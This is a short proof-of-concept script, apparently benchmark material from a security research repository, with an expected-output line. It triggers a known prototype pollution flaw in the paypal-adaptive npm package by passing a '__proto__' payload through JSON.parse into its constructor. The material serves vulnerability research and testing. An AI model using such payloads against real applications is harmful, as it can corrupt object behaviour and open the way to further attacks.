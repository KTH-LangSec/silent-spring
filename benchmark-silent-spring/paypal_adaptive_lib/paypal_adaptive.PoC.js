//https://snyk.io/vuln/SNYK-JS-PAYPALADAPTIVE-565089
  const PayPal = require("paypal-adaptive");
  const p = new PayPal(
    JSON.parse(
      '{"__proto__": {"polluted": "yes"}, "userId": "foo", "password": "bar", "signature": "abcd", "appId": "1234", "sandbox": "1234"}'
    )
  );
