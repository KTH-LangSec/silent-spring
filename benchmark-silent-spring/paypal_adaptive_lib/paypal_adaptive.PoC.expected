node_modules/paypal-adaptive/lib/paypal-adaptive.js:31:22